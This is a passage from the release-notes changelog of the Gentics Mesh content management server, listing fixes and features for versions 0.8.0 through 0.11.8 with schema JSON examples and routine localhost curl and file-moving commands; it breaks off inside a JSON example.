CAUTION: The `search.httpEnabled` option within the `mesh.yml` has been removed. The embedded elasticsearch API can no longer be directly accessed via HTTP. The existing endpoint `{apiLatest}/:projectName/search` is unaffected by this change.

icon:plus[] Core: The core Vert.x library was updated to version 3.5.0.

icon:plus[] Core: The internal server routing system has been overhauled.

== 0.11.8 (18.12.2017)

icon:check[] Image: Fixed a bug which left file handles open and thus clogged the system. This could lead to a lock-up of the system in some cases.

== 0.11.7 (17.12.2017)

icon:check[] UI: Fixed an issue where the name in the explorer content list was always shown in English. link:https://github.com/gentics/mesh/issues/23[#23]

icon:check[] Storage: Binary field deletion has been made more resilient and will no longer fail if the referenced binary data is not stored within the used binary storage. link:https://github.com/gentics/mesh/issues/235[#235]

icon:plus[] REST: The `hostname` and `ssl` properties have been added to the project create request. This information will be directly added to the initial release of the project. The properties can thus be changed by updating the project.

icon:plus[] REST: The link resolver mechanism was enhanced to also consider the `hostname` and `ssl` flag of the release of the node which is linked.
 The link resolver will make use of these properties as soon as mesh links point to nodes of foreign projects.
 You can read more on this topic in the link:{{< relref "features.asciidoc" >}}#crossdomainlinks[cross domain link section] of our documentation.
== 0.11.6 (15.12.2017)

icon:plus[] Search: The automatic recreation of the search index will now also occur if an empty search index folder was found.

icon:check[] UI: Nodes are now always reloaded when the edit button is clicked in the explorer content list. link:https://github.com/gentics/mesh-ui/issues/16[#16]

icon:check[] UI: Fixed an issue that was causing a click on a node in the explorer list to open it like a container, even if it is not a container.

icon:check[] UI: Dropdowns for required string fields with the allowed attribute now properly require a value to be set in order to save the node.

icon:check[] UI: Fixed an issue where the contents of a micronode were not validated before saving a node.

icon:check[] Core: Reduced the memory load of the ChangeNumberStringsToNumber changelog entry by reducing the size of single transactions.

icon:check[] Image: Image handling has been optimized. Previously resizing larger images could temporarily lock up the http server.

== 0.11.5 (14.12.2017)

icon:plus[] UI: Add multi binary upload dialogue. Users can now upload multiple files at once by clicking the button next to the create node button.

icon:plus[] UI: Binary fields can now be used as display fields. The filename is used as the display name for the node. link:https://github.com/gentics/mesh-ui/issues/11[#11]

icon:plus[] UI: It is now possible to specify the URL to the front end of a system. This allows users to quickly go to the page that represents the node in the system.
 See the default `mesh-ui-config.js` or the link:{{< relref "user-interface.asciidoc" >}}#_configuration[online documentation] for more details. link:https://github.com/gentics/mesh-ui/issues/14[#14]

icon:plus[] Upload: The upload handling code has been refactored in order to process the uploaded data in parallel.

icon:plus[] Storage: The binary storage mechanism has been overhauled in preparation for Amazon S3 / link:https://minio.io/[Minio] support.
 The data within the local binary storage folder and all binary fields will automatically be migrated.
 The created `binaryFilesMigrationBackup` folder must be manually removed once the migration has finished.

icon:plus[] Core: The OrientDB graph database was updated to version 2.2.31.

icon:plus[] Core: Binary fields can now be chosen as display fields. The value of the display field is the filename of the binary.

icon:plus[] REST: The display name has been added to the node response. It can be found in the key `displayName`.

icon:plus[] GraphQL: The display name can now be fetched from a node via the `displayName` field.

icon:check[] UI: Nodes in the "Select Node..." dialogue are now sorted by their display name. link:https://github.com/gentics/mesh-ui/issues/15[#15]

icon:check[] UI: The "Select Node..." dialogue now remembers the last position at which it was opened. link:https://github.com/gentics/mesh-ui/issues/12[#12]

icon:check[] UI: The dropdown for list types in the schema editor now only shows valid list types.

icon:check[] UI: Fixed a bug that caused the image preview to disappear after saving a node. link:https://github.com/gentics/mesh-ui/issues/18[#18]
icon:check[] Core: A bug has been fixed which prevented node updates.
 The issue occurred once a node was updated from which a language variant was previously deleted.

icon:check[] Search: The search index will now automatically be recreated if the search index folder could not be found.

icon:check[] Core: The values of number fields were stored as strings in the database which caused issues when converting numbers to and from strings.
 This has been fixed: the values of number fields will now be stored as numbers.

icon:check[] Schema: The schema deletion process will now also include all schema versions, referenced changes and jobs.

icon:check[] Clustering: An NPE which could occur during the initial setup of a clustered instance has been fixed.

== 0.11.4 (07.12.2017)

icon:check[] Core: Fixed various errors which could occur when loading a node for which the editor or creator user has been previously deleted.

== 0.11.3 (30.11.2017)

icon:plus[] Core: Various performance enhancements have been made to increase the concurrency handling and to lower the request times.

icon:plus[] Websocket: It is now possible to register to a larger set of internal events.
 A full list of all events is documented within the link:{{< relref "features.asciidoc" >}}#_eventbus_bridge_websocket[eventbus bridge / websocket documentation].

icon:plus[] Config: The eventloop and worker pool size can now be configured within the `mesh.yml` file.

icon:plus[] Logging: The logging verbosity was reduced.

icon:plus[] GraphQL: It is now possible to load a list of all languages of a node via the added `.languages` field.

icon:plus[] GraphQL: The underlying graphql-java library was updated to version 6.0.

icon:check[] Core: Fixed a bug which prevented uploading multiple binaries to the same node.

icon:check[] UI: Fixed error message handling for failed save requests.

icon:check[] UI: Fixed the dropdown positioning in IE within the node edit area.

icon:check[] Memory: The memory usage for micronode migrations has been improved.

== 0.11.2 (21.11.2017)

icon:plus[] Core: The OrientDB graph database was updated to version 2.2.30.

icon:check[] Core: Fixed a bug which caused unusually high CPU usage. link:https://github.com/gentics/mesh/issues/201[#201]

== 0.11.1 (13.11.2017)

icon:plus[] Elasticsearch: Added support for inline queries.

icon:check[] Elasticsearch: In some cases the connection to Elasticsearch was not directly ready during start up. This caused various issues. A start-up check has been added in order to prevent this.

icon:check[] Schema: A bug within the schema update mechanism which removed the urlField property value has been fixed.

icon:check[] Elasticsearch: A deadlock situation which could occur during schema validation was fixed.

== 0.11.0 (11.11.2017)

CAUTION: GraphQL: The root field `releases` has been removed. The root field `release` now takes no parameters and loads the active release.

CAUTION: Elasticsearch: Search queries will now automatically be wrapped in a boolean query in order to check permissions much more efficiently.

CAUTION: The schema field property `searchIndex` / `searchIndex.addRaw` has been removed. The property was replaced by a mapping definition which can be added to each field.
 All schemas will automatically be migrated to the new format.
 Please keep in mind to also update any existing schema files which you may have stored externally.

```json
{
  "name": "dummySchema",
  "displayField": "name",
  "fields": [
    {
      "name": "name",
      "label": "Name",
      "required": true,
      "type": "string",
      "elasticsearch": {
        "raw": {
          "index": "not_analyzed",
          "type": "string"
        }
      }
    }
  ]
}
```
icon:plus[] Schema: It is now possible to configure index settings and custom search index field mappings within the schema.

The index settings can be used to define new link:https://www.elastic.co/guide/en/elasticsearch/reference/current/analysis-analyzers.html[analyzers] and link:https://www.elastic.co/guide/en/elasticsearch/reference/current/analysis-tokenizers.html[tokenizers] or other additional link:https://www.elastic.co/guide/en/elasticsearch/guide/current/_index_settings.html[index settings].
The specified settings will automatically be merged with a default set of settings.

Once a new analyzer has been defined it can be referenced by custom field mappings which can now be added to each field.
The specified field mapping will be added to the generated fields property of the mapping. You can read more about this topic in the link:https://www.elastic.co/guide/en/elasticsearch/reference/current/multi-fields.html[fields mapping documentation] of Elasticsearch.

```json
{
  "name": "dummySchema",
  "displayField": "name",
  "elasticsearch": {
    "settings": {
      "number_of_shards": 1,
      "number_of_replicas": 0
    },
    "analysis": {
      "analyzer": {
        "suggest": {
          "tokenizer": "mesh_default_ngram_tokenizer",
          "char_filter": ["html_strip"],
          "filter": ["lowercase"]
        }
      }
    }
  },
  "fields": [
    {
      "name": "name",
      "label": "Name",
      "required": true,
      "type": "string",
      "elasticsearch": {
        "suggest": {
          "analyzer": "suggest",
          "type": "string"
        }
      }
    }
  ]
}
```

You can use the `POST {apiLatest}/utilities/validateSchema` endpoint to validate and inspect the effective index configuration.
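For example (a sketch; `/api/v1` stands in for `{apiLatest}` and `dummySchema.json` is assumed to contain the schema shown above):

[source,bash]
----
# Validate the schema JSON and inspect the generated index configuration
# without actually storing the schema
curl -X POST -H "Content-Type: application/json" \
     -d @dummySchema.json \
     localhost:8080/api/v1/utilities/validateSchema
----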
icon:plus[] REST: The `POST {apiLatest}/utilities/validateSchema` and `POST {apiLatest}/utilities/validateMicroschema` endpoints can now be used to validate a schema/microschema JSON without actually storing it.
 The validation response will also contain the generated Elasticsearch index configuration.

icon:plus[] GraphQL: Nodes can now be loaded in the context of a schema. This will return all nodes which use the schema.

icon:plus[] Search: The `{apiLatest}/rawSearch/..` and `{apiLatest}/:projectName/rawSearch/..` endpoints have been added. These can be used to invoke search requests which will return the raw elasticsearch response JSON.
 The needed indices will automatically be selected in order to only return the type specific documents. Read permissions on the document will also be automatically checked.

icon:plus[] Search: Error information for failed Elasticsearch queries will now be added to the response.

icon:plus[] Webroot: The schema property `urlFields` can now be used to specify fields which contain webroot paths.
 The webroot endpoint in turn will first try to find a node which specifies the requested path.
 If no node could be found using the urlField values the regular segment path will be used to locate the node.
 This feature can be used to set custom URLs or short URLs for your nodes.
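A sketch of how a schema could make use of this (the schema and field names are illustrative):

[source,json]
----
{
  "name": "article",
  "displayField": "title",
  "segmentField": "slug",
  "urlFields": ["shortUrl"],
  "fields": [
    { "name": "title", "type": "string" },
    { "name": "slug", "type": "string" },
    { "name": "shortUrl", "type": "string" }
  ]
}
----

A node whose `shortUrl` field contains `/sale` would then also be resolvable via the webroot endpoint under that exact path, while the regular segment based resolving keeps working as before.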
icon:check[] Performance: Optimized binary download memory usage.

icon:check[] REST: Fixed a bug which prevented pages with more than 2000 items from being loaded.

== 0.10.4 (10.10.2017)

CAUTION: REST: The `availableLanguages` field now also contains the publish information of the languages of a node.

icon:check[] REST: Fixed a bug in the permission system. Permissions on microschemas will now correctly be updated when applying permissions recursively on projects.

icon:check[] REST: ETags will now be updated if the permission on the element changes.

icon:check[] Core: Various bugs within the schema / microschema migration code have been addressed and fixed.

icon:check[] Core: The search index handling has been updated. A differential synchronization will be run to update the new search index and thus the old index data can still be used.

icon:check[] Performance: Removing permissions has been optimized.

icon:plus[] UI: A new action was added to the node action context menu. It is now possible to unpublish nodes.

icon:plus[] UI: The Mesh UI was updated.

icon:plus[] Config: It is now possible to configure the host to which the Gentics Mesh http server should bind via the `httpServer.host` setting in the `mesh.yml` file. The default is still 0.0.0.0 (all interfaces).

icon:plus[] REST: The `{apiLatest}/:projectName/releases/:releaseUuid/migrateSchemas` and `{apiLatest}/:projectName/releases/:releaseUuid/migrateMicroschemas` endpoints have been changed from `GET` to `POST`.

icon:plus[] REST: The `{apiLatest}/admin/reindex` and `{apiLatest}/admin/createMappings` endpoints have been changed from `GET` to `POST`.

icon:plus[] CLI: It is now possible to reset the admin password using the `-resetAdminPassword` command line argument.

icon:plus[] GraphQL: The underlying graphql-java library was updated to version 5.0.

icon:plus[] Core: The OrientDB graph database was updated to version 2.2.29.

== 0.10.3 (18.09.2017)

icon:plus[] Logging: The `logback.xml` default logging configuration file will now be placed in the `config` folder. The file can be used to customize the logging configuration.

icon:plus[] Configuration: It is now possible to set custom properties within the elasticsearch settings.

icon:plus[] Core: The OrientDB graph database was updated to version 2.2.27.

icon:plus[] REST: It is now possible to set and read permissions using paths which contain the project name. Example: `GET {apiLatest}/roles/:roleUuid/permissions/:projectName/...`

icon:check[] Search: A potential race condition has been fixed. This condition previously caused elasticsearch to no longer accept any changes.

icon:check[] Performance: The REST API performance has been improved by optimizing the JSON generation process. link:https://github.com/gentics/mesh/issues/141[#141]

== 0.10.2 (14.09.2017)

icon:book[] Documentation: The new link:{{< relref "security.asciidoc" >}}[security] and link:{{< relref "performance.asciidoc" >}}[performance] sections have been added to our documentation.

icon:plus[] The *Webroot-Response-Type* header can now be used to differentiate between webroot binary and node responses. The value of this header can either be *binary* or *node*.

icon:plus[] The `{apiLatest}/admin/status/migrations` endpoint was removed.
 The status of a migration job can now be obtained via the `{apiLatest}/admin/jobs` endpoint. Successfully executed jobs will no longer be removed from the job list.

icon:plus[] The `{apiLatest}/:projectName/release/:releaseUuid/schemas` and `{apiLatest}/:projectName/release/:releaseUuid/microschemas` endpoints have been reworked.
 The response format has been updated. The status and uuid of the job which was invoked when the migration was started will now also be included in this response.

icon:check[] Java REST Client: A potential threading issue within the Java REST Client has been fixed. Vert.x http clients will no longer be shared across multiple threads.

icon:check[] Memory: Reduced the memory footprint of microschema migrations. link:https://github.com/gentics/mesh/issues/135[#135]

icon:check[] Fixed the handling of the "required" and "allow" properties of schema fields when adding fields to schemas.

== 0.10.1 (08.09.2017)

icon:plus[] Clustering: Added link:{{< relref "clustering.asciidoc" >}}#_node_discovery[documentation] and support for cluster configurations which use a list of static IP addresses instead of multicast discovery.

icon:plus[] Node Migration: The node migration performance has been increased.

icon:plus[] REST: Added new endpoints `{apiLatest}/admin/jobs` to list and check queued migration jobs. The new endpoints are described in the link:{{< relref "features.asciidoc" >}}#_executing_migrations[feature documentation].

icon:check[] Search: The `raw` field will no longer be added by default to the search index. Instead it can be added using the new `searchIndex.addRaw` flag within the schema field, as shown in the example below.
 Please note that the raw field value in the search index will be automatically truncated to a size of 32KB. Otherwise the value can't be added to the search index.

[source,json]
----
{
  "name": "name",
  "label": "Name",
  "required": true,
  "type": "string",
  "searchIndex": {
    "addRaw": true
  }
}
----

icon:check[] Migration: Interrupted migrations will now automatically be started again after the server has been started. Failed migration jobs can be purged or reset via the `{apiLatest}/admin/jobs` endpoint.

icon:check[] Migration: Migrations will no longer fail if a required field was added. The field will be created and no value will be set. Custom migration scripts can still be used to add a custom default value during migration.

icon:check[] Java REST Client: Various missing request parameter implementations have been added to the mesh-rest-client module.

icon:check[] Node Migration: A bug has been fixed which prevented node migrations with more than 5000 elements from completing.

icon:check[] GraphQL: Updated the GraphiQL browser to the latest version to fix various issues when using aliases.

== 0.10.0 (04.09.2017)

CAUTION: Manual Change: Configuration changes. For already existing `mesh.yml` files, the `nodeName` setting has to be added. Choose any name for the mesh instance.

CAUTION: Manual Change: Configuration changes. The `clusterMode` setting has been deprecated in favour of the new cluster configuration. This setting must be removed from the `mesh.yml` file.

[CAUTION]
=====================================================================
Manual Change: The configuration files `mesh.yml` and `keystore.jceks` must be moved to the `config` subfolder.

[source,bash]
----
mkdir config
mv mesh.yml config
mv keystore.jceks config
----
=====================================================================

[CAUTION]
=====================================================================
Manual Change: The graph database folder needs to be moved. Please create the `storage` subfolder and move the existing data into that folder.

[source,bash]
----
mkdir -p data/graphdb/storage
mv data/graphdb/* data/graphdb/storage/
----
=====================================================================
icon:plus[] Clustering: This release introduces the master-master clustering support. You can read more about clustering and the configuration in the link:{{< relref "clustering.asciidoc" >}}[clustering documentation].

icon:plus[] Core: The OrientDB graph database was updated to version 2.2.26.

icon:plus[] REST: The `{apiLatest}/admin/consistency/check` endpoint has been added. The endpoint can be used to verify the database integrity.

icon:check[] Core: Fixed missing OrientDB roles and users for some older graph databases. Some graph databases did not create the needed OrientDB user and roles. These roles and users are needed for the OrientDB server and are different from Gentics Mesh users and roles.

icon:check[] REST: Invalid date strings were not correctly handled. An error will now be thrown if a date string can't be parsed.

icon:check[] REST: The delete handling has been updated.
 It is now possible to specify the `?recursive=true` parameter to recursively delete nodes.
 By default `?recursive=false` will be used. Deleting a node which contains children will thus cause an error.
 The behaviour of node language deletion has been updated as well. Deleting the last language of a node will also remove this node. This removal will again fail if no `?recursive=true` query parameter has been added.
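A sketch of the new behaviour (project name and uuid are placeholders; `/api/v1` stands in for `{apiLatest}`):

[source,bash]
----
# Fails with an error if the node still has children
curl -X DELETE "localhost:8080/api/v1/demo/nodes/:nodeUuid"

# Deletes the node together with all of its children
curl -X DELETE "localhost:8080/api/v1/demo/nodes/:nodeUuid?recursive=true"
----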
== 0.9.28 (28.08.2017)

icon:check[] Core: The permission check system has been updated. Elements which have only the `readPublished` permission can now also be read if the user has only the `read` permission. The `read` permission automatically also grants `readPublished`.

icon:check[] Java REST Client: The classes `NodeResponse` and `MicronodeField` now correctly implement the interface `FieldContainer`.

icon:check[] REST: The endpoint `{apiLatest}/{projectName}/nodes/{nodeUuid}/binary/{fieldName}` did not correctly handle the read published nodes permission. This has been fixed now. link:https://github.com/gentics/mesh/issues/111[#111]

== 0.9.27 (23.08.2017)

icon:plus[] GraphQL: It is now possible to retrieve the unfiltered result count. This count is directly loaded from the search provider and may not match up with the exact filtered count.
 The advantage of this value is that it can be retrieved very fast.

icon:plus[] Java REST Client: The client now also supports encrypted connections.

icon:check[] REST: Invalid dates were not correctly handled. An error will now be thrown if a date string can't be parsed.

icon:check[] GraphQL: Various errors which occurred when loading a schema of a node via GraphQL have been fixed now.

== 0.9.26 (10.08.2017)

icon:plus[] UI: Added CORS support. Previously CORS was not supported by the UI.

icon:check[] REST API: Added missing allowed CORS headers which were needed to use the Gentics Mesh UI in a CORS environment.

icon:check[] UI: Fixed the translation action. Previously an error prevented translations from being executed.

icon:check[] UI: Fixed image handling for binary fields. Previously only the default language image was displayed in the edit view. This has been fixed.

== 0.9.25 (09.08.2017)

icon:plus[] Demo: The demo dump extraction will now also work if an empty data folder exists. This is useful when providing a docker mount for the demo data.

icon:plus[] GraphQL: The paging performance has been improved.

icon:plus[] Core: Various missing permission checks have been added.

icon:check[] Core: A bug in the schema changes apply code has been fixed. The bug previously prevented schema changes from being applied.

== 0.9.24 (03.08.2017)

icon:plus[] REST API: Added idempotency checks for various endpoints to prevent the execution of superfluous operations. (E.g. assigning a role to a group, assigning a schema to a project)

icon:check[] Core: Fixed a bug which prevented micronodes from being transformed. SUP-4751

== 0.9.23 (02.08.2017)

icon:plus[] REST Client: It is now possible to configure the base uri for the rest client.

icon:plus[] GraphQL: It is now possible to get the references of all projects from schemas and microschemas.

icon:check[] UI: Date fields now work with ISO 8601 strings rather than Unix timestamps.

icon:check[] UI: Fixed bugs with lists of microschemas. (SUP-4712)

icon:check[] UI: Fixed mouse clicks not working in lists in FF and (partially) in IE/Edge. (SUP-4717)

icon:check[] Core: The reindex performance has been increased and additional log output will be provided during reindex operations.

== 0.9.22 (28.07.2017)

icon:plus[] REST API: It is now possible to create nodes, users, groups, roles, releases and projects using a provided uuid.

icon:check[] Versioning: A publish error which was caused by a bug in the node language deletion code has been fixed.
== 0.9.21 (26.07.2017)

icon:plus[] Core: The OrientDB graph database was updated to version 2.2.24.

icon:check[] Core: Fixed the handling of ISO8601 dates which did not contain a UTC flag or time offset value. Such dates could previously not be stored. Note that ISO8601 UTC dates will always be returned.

icon:check[] GraphQL: The URL handling of the GraphQL browser has been improved. Previously very long queries led to very long query parameters which could not be handled correctly. The query browser will now use the anchor part of the URL to store the query.

icon:check[] Migration: The error handling within the schema migration code has been improved.

icon:plus[] GraphQL: It is now possible to load the schema version of a node using the `schema` field.

icon:check[] Versioning: Older Gentics Mesh instances (>0.8.x) were lacking some draft information. This information has been added now.

== 0.9.20 (21.07.2017)

icon:plus[] License: The license was changed to Apache License 2.0.

icon:plus[] Schema Versions: The schema version field type was changed from `number` to `string`. It is now also possible to load schema and microschema versions using the `?version` query parameter.

icon:check[] Search: The error reporting for failing queries has been improved.

icon:check[] Search: The total page count value has been fixed for queries which were using `?perPage=0`.

== 0.9.19 (07.07.2017)

icon:check[] UI: Fixed adding a node to a node list.

icon:check[] Docs: Various endpoints were not included in the generated RAML. This has been fixed now.

== 0.9.18 (30.06.2017)

icon:plus[] Demo: Fixed demo data uuids.

icon:plus[] Core: The OrientDB graph database was updated to version 2.2.22.

icon:plus[] Core: The Ferma OGM library was updated to version 2.2.2.

== 0.9.17 (21.06.2017)

icon:check[] UI: A bug which prevented micronodes which contained an empty node field from being saved was fixed.

icon:check[] Core: Issues within the error reporting mechanism have been fixed.

icon:plus[] Server: The Mesh UI was added to the mesh-server jar.

icon:plus[] Core: The internal transaction handling has been refactored.

icon:plus[] Core: The Vert.x core dependency was updated to version 3.4.2.

icon:plus[] API: The version fields of node responses and publish status responses are now strings instead of objects containing the version number.

== 0.9.16 (19.06.2017)

icon:book[] Documentation: Huge documentation update.

== 0.9.15 (19.06.2017)

icon:check[] GraphQL: Fixed loading tags for nodes.

== 0.9.14 (09.06.2017)

icon:check[] WebRoot: Bugs within the permission handling have been fixed. It is now possible to load nodes using only the *read_published* permission. This permission was previously ignored.

icon:check[] GraphQL: An introspection bug which prevented the graphiql browser auto completion from working correctly has been fixed. The bug did not occur on systems which already used microschemas.

== 0.9.13 (08.06.2017)

icon:check[] UI: The UI was updated. A file upload related bug was fixed.

icon:check[] UI: The schema & microschema description is no longer a required field.

== 0.9.12 (08.06.2017)

icon:check[] GraphQL: Fixed the handling of node lists within micronodes.

icon:check[] GraphQL: Fixed a "Micronode type not found" error.

icon:check[] GraphQL: Fixed the GraphQL API for systems which do not contain any microschemas.

icon:check[] GraphQL: Fixed permission handling and filtering when dealing with node children.

== 0.9.11 (07.06.2017)

icon:plus[] GraphQL: The GraphQL library was updated. Various GraphQL related issues have been fixed.

== 0.9.10 (29.05.2017)

icon:plus[] Schemas: The default content and folder schemas have been updated. The `fileName` and `folderName` fields have been renamed to `slug`. The `name` field was removed from the content schema and a `teaser` field has been added.
These changes are optional and thus not automatically applied to existing installations.

icon:plus[] Demo: The `folderName` and `fileName` fields have been renamed to `slug`. This change only affects new demo installations.

icon:check[] GraphQL: The language fallback handling was overhauled. The default language will no longer automatically be appended to the list of fallback languages. This means that loading nodes will only return nodes in those languages which have been specified by the `lang` argument.

icon:check[] GraphQL: The `path` handling for nodes within node lists has been fixed.
 Previously it was not possible to retrieve the `path` and various other fields for those nodes.
== 0.9.9 (19.05.2017)

icon:plus[] Core: The OrientDB graph database was updated to version 2.2.20.

icon:plus[] API: The following endpoints were moved:

 * `{apiLatest}/admin/backup` ⟶ `{apiLatest}/admin/graphdb/backup`
 * `{apiLatest}/admin/export` ⟶ `{apiLatest}/admin/graphdb/export`
 * `{apiLatest}/admin/import` ⟶ `{apiLatest}/admin/graphdb/import`
 * `{apiLatest}/admin/restore` ⟶ `{apiLatest}/admin/graphdb/restore`

icon:plus[] Core: Added the `{apiLatest}/:projectName/releases/:releaseUuid/migrateMicroschemas` endpoint which can be used to resume previously unfinished micronode migrations.

icon:plus[] Performance: The startup performance has been increased when dealing with huge datasets.

icon:plus[] Auth: The anonymous authentication mechanism can now also be disabled by setting the `Anonymous-Authentication: disable` header. This is useful for client applications which don't need or want anonymous authentication. The Gentics Mesh REST client has been enhanced accordingly.
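For example (a sketch; `/api/v1/auth/me` is just a convenient endpoint to demonstrate the header):

[source,bash]
----
# Without credentials this request would normally fall back to the anonymous
# user; the header disables that fallback for this request.
curl -H "Anonymous-Authentication: disable" localhost:8080/api/v1/auth/me
----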
icon:plus[] Core: The read performance of node lists has been improved.

icon:plus[] Core: The write performance of nodes has been improved.

icon:plus[] Demo: The demo data has been updated. The folderName and fileName fields have been added to the demo schemas.

icon:plus[] GraphQL: Added micronode list handling. Previously it was not possible to handle micronode list fields.

icon:check[] Core: Fixed an NPE that was thrown when loading releases on older systems.

icon:check[] Core: An upgrade error has been fixed which was caused by an invalid microschema JSON format error.

icon:check[] UI: You will no longer be automatically logged in as the anonymous user once your session expires.

icon:check[] Core: The language fallback handling for node breadcrumbs has been fixed. Previously the default language was not automatically added to the handled languages.

== 0.9.8 (08.05.2017)

icon:plus[] UI: Microschemas can now be assigned to projects.

icon:plus[] UI: Descriptions can now be assigned to schemas & microschemas.

icon:plus[] Core: A bug was fixed which prevented the node response `project` property from being populated.

icon:plus[] Core: The redundant `isContainer` field was removed from the node response.

icon:plus[] Core: Various bugs for node migrations have been fixed.

icon:plus[] Core: The allow property for micronode schema fields will now correctly be handled.

icon:plus[] Core: Microschemas will now be assigned to projects during a schema update. This only applies to microschemas which are referenced by the schema (e.g. via a micronode field).

icon:plus[] Core: The OrientDB graph database was updated to version 2.2.19.

== 0.9.7 (28.04.2017)

icon:plus[] GraphQL: The nested `content` and `contents` fields have been removed. The properties of those fields have been merged with the `node` / `nodes` field.

icon:plus[] GraphQL: The field names for paged resultset meta data have been updated to better match up with the REST API fields.

icon:plus[] GraphQL: A language can now be specified when loading node reference fields using the `lang` argument.

icon:plus[] GraphQL: It is now possible to resolve links within loaded fields using the `linkType` field argument.

icon:plus[] Auth: Support for anonymous access has been added to mesh. Requests which do not provide a `mesh.token` will automatically try to use the `anonymous` user. This user is identified by its username, and thus no anonymous access support is provided if the user can't be located.

icon:plus[] GraphQL: It is now possible to retrieve the path for a content using the `path` field. The `Node.languagePaths` field has been removed in favour of this new field.

icon:plus[] Auth: It is now possible to issue API tokens via the `GET {apiLatest}/users/:userUuid/token` endpoint. API tokens do not expire and work in conjunction with the regular JWT authentication mechanism. These tokens should only be used when SSL is enabled. The `DELETE {apiLatest}/users/:userUuid/token` endpoint can be used to revoke the issued API token. Only one API token is supported per user. Generating a new API token will invalidate the previously issued token.
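A sketch of the token lifecycle (`/api/v1` stands in for `{apiLatest}`):

[source,bash]
----
# Issue a new API token; a previously issued token becomes invalid
curl localhost:8080/api/v1/users/:userUuid/token

# Revoke the currently issued API token
curl -X DELETE localhost:8080/api/v1/users/:userUuid/token
----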
icon:check[] GraphQL: An error was fixed which occurred when loading a node using a bogus uuid.

icon:check[] Auth: An error which caused the keystore loading process to fail was fixed.

== 0.9.6 (14.04.2017)

icon:plus[] It is now possible to resume previously aborted schema migrations via the `{apiLatest}/:projectName/releases/:releaseUuid/migrateSchemas` endpoint.

icon:plus[] Auth: The Java keystore file will now automatically be created if none could be found. The keystore password will be taken from the `mesh.yml` file or randomly generated and stored in the config.

icon:check[] Core: Migration errors will no longer cause a migration to be aborted. The migration will continue and log the errors. An incomplete migration can be resumed later on.

icon:check[] Core: Fixed the node migration search index handling. Previous migrations did not correctly update the index. An automatic reindex will be invoked during startup.

== 0.9.5 (13.04.2017)

icon:check[] Core: The schema check for duplicate field labels has been removed. The check previously caused schema updates to fail.

== 0.9.4 (13.04.2017)

icon:check[] UI: Fixed project creation.

icon:check[] UI: Fixed an error when attempting to translate a node.

icon:check[] UI: Fixed an incorrect search query.

icon:check[] UI: Display an error when attempting to publish a node with an unpublished ancestor.

icon:check[] JWT: The `signatureSecret` property within the Gentics Mesh configuration has been renamed to `keystorePassword`.

icon:plus[] JWT: It is now possible to configure the algorithm which is used to sign the JWT tokens.

icon:plus[] Java: The Java model classes have been updated to provide fluent APIs.

icon:plus[] Demo: It is now possible to access the elasticsearch head UI directly from mesh via http://localhost:8080/elastichead - The UI will only be provided if the elasticsearch http ports are enabled. Only enable this for development since mesh will not protect the Elasticsearch HTTP server.

icon:plus[] Core: Downgrade and upgrade checks have been added. It is no longer possible to run Gentics Mesh using a dump which contains data that was touched by a newer mesh version. Upgrading a snapshot version of Gentics Mesh to a release version can be performed under advisement.

== 0.9.3 (10.04.2017)

icon:check[] UI: A bug which prevented assigning created schemas to projects was fixed.

icon:check[] A bug which could lead to concurrent requests failing was fixed.

icon:check[] Error handling: A much more verbose error will be returned when creating a schema which lacks the type field for certain schema fields.

icon:check[] GraphQL: A bug which led to incorrect column values for GraphQL errors was fixed.

icon:plus[] The OrientDB dependency was updated to version 2.2.18.

icon:plus[] GraphQL: The container/s field was renamed to content/s to ease usage.

icon:plus[] GraphQL: It is no longer possible to resolve nodes using the provided webroot path. The path argument and the resolving were moved to the `content` field.

== 0.9.2 (04.04.2017)

icon:plus[] The `{apiLatest}/admin/backup`, `{apiLatest}/admin/restore`, `{apiLatest}/admin/import` and `{apiLatest}/admin/export` endpoints were added to the REST API. These endpoints allow the creation of backup dumps.

icon:plus[] GraphQL: It is now possible to execute elasticsearch queries within the GraphQL query.

icon:plus[] GraphQL: It is now possible to resolve a partial web root path using the `child` field of a node.

icon:plus[] GraphQL: It is now possible to resolve information about the running mesh instance via GraphQL.

icon:check[] Various issues with the linkType argument within the GraphQL API have been fixed.

icon:check[] Fixed an NPE that occurred when loading a container for a language which did not exist.

== 0.9.1 (28.03.2017)

icon:check[] The `Access-Control-Allow-Credentials: true` header will now be returned when CORS support is enabled.

icon:check[] A NullPointerException within the Java REST Client was fixed.

icon:check[] The AngularJS demo was updated.

== 0.9.0 (27.03.2017)

icon:plus[] Gentics Mesh now supports GraphQL.

icon:important[] The `expandAll` and `expand` parameters will be removed within an upcoming release of Gentics Mesh. We highly recommend to use the GraphQL endpoint instead if you want to fetch deeply nested data.

icon:plus[] Schema name validation - Schema and microschema names must only contain letter, number or underscore characters.

icon:plus[] Node Tag Endpoint

The endpoint `{apiLatest}/:projectName/nodes/:nodeUuid/tags` was enhanced. It is now possible to post a list of tag references which will be applied to the node. Tags which are not part of the list will be removed from the node. Tags which do not exist will be created. Please note that tag families will not automatically be created.

The `tags` field within the node response was updated accordingly.
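A sketch of such an update request; the exact request body shape is an assumption derived from the description above (tag references consisting of a name and a tag family):

[source,json]
----
{
  "tags": [
    { "name": "red", "tagFamily": "colors" },
    { "name": "blue", "tagFamily": "colors" }
  ]
}
----

Posting this list would keep or create the tags `red` and `blue` on the node and remove all other tags from it.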
== 0.8.3 (24.02.2017)

icon:plus[] Tags are now also indexed in the node document in the field `tagFamilies`, grouped by tag families.

== 0.8.2 (23.02.2017)

icon:check[] The trigram filter configuration was updated so that all characters will be used to tokenize the content.

== 0.8.1 (21.02.2017)

icon:check[] A bug which prevented index creation in certain cases was fixed.

== 0.8.0 (10.02.2017)

icon:plus[] Names, string fields and html field values will now be indexed using the https://www.elastic.co/guide/en/elasticsearch/guide/current/ngrams-compound-words.html[trigram analyzer].

icon:plus[] Binary Endpoint Overhaul

The field API endpoint `{apiLatest}/:projectName/nodes/:nodeUuid/languages/:language/fields/:field` was removed and replaced by the binary `{apiLatest}/:projectName/nodes/:nodeUuid/binary` endpoint.
The binary endpoints are now also versioning aware and handle conflict detection. It is thus required to add the `language` and `version` form data parameters to the upload request.

icon:plus[] Transform Endpoint Overhaul

The endpoint `{apiLatest}/:projectName/nodes/:nodeUuid/languages/:language/fields/:field/transform` was renamed to `{apiLatest}/:projectName/nodes/:nodeUuid/binaryTransform`.
The transform endpoint will now return the updated node.

icon:plus[] The no longer needed schemaReference property was removed from node update requests.

icon:plus[] The rootNodeUuid property within the node project response was changed.

[quote, Example]
____
Old structure:
[source,json]
----
{
…
  "rootNodeUuid" : "cd5ac8943a4448ee9ac8943a44a8ee25",
…
}
----

New structure:
[source,json]
----
{
…
  "rootNode": {
